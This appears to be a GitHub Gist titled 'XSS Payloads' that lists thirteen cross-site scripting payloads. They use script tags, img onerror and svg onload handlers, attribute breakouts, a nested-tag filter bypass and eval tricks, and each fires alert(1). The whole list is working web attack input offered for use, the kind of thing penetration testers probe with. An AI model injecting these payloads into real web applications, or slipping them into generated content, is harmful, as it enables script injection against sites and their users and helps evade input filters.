Created
November 22, 2023 11:34
-
-
Save karimmuya/ca2bb6755f8d293248a4b36437fd9cc0 to your computer and use it in GitHub Desktop.
XSS Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script>alert(1)</script> | |
<scr<script>ipt>alert(1)</scr<script>ipt> | |
"><script>alert(1)</script> | |
</script><script>alert(1)</script> | |
<img src=x onerror=alert(1);> | |
<img src=x onerror=alert(1)// | |
<img src=x:alert(alt) onerror=eval(src) alt=1> | |
"><img src=x onerror=alert(1);> | |
<svg onload=alert(1)> | |
<svg/onload=alert(1)> | |
<svg onload=alert(1)// | |
<svg id=alert(1) onload=eval(id)> | |
"><svg/onload=alert(1) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment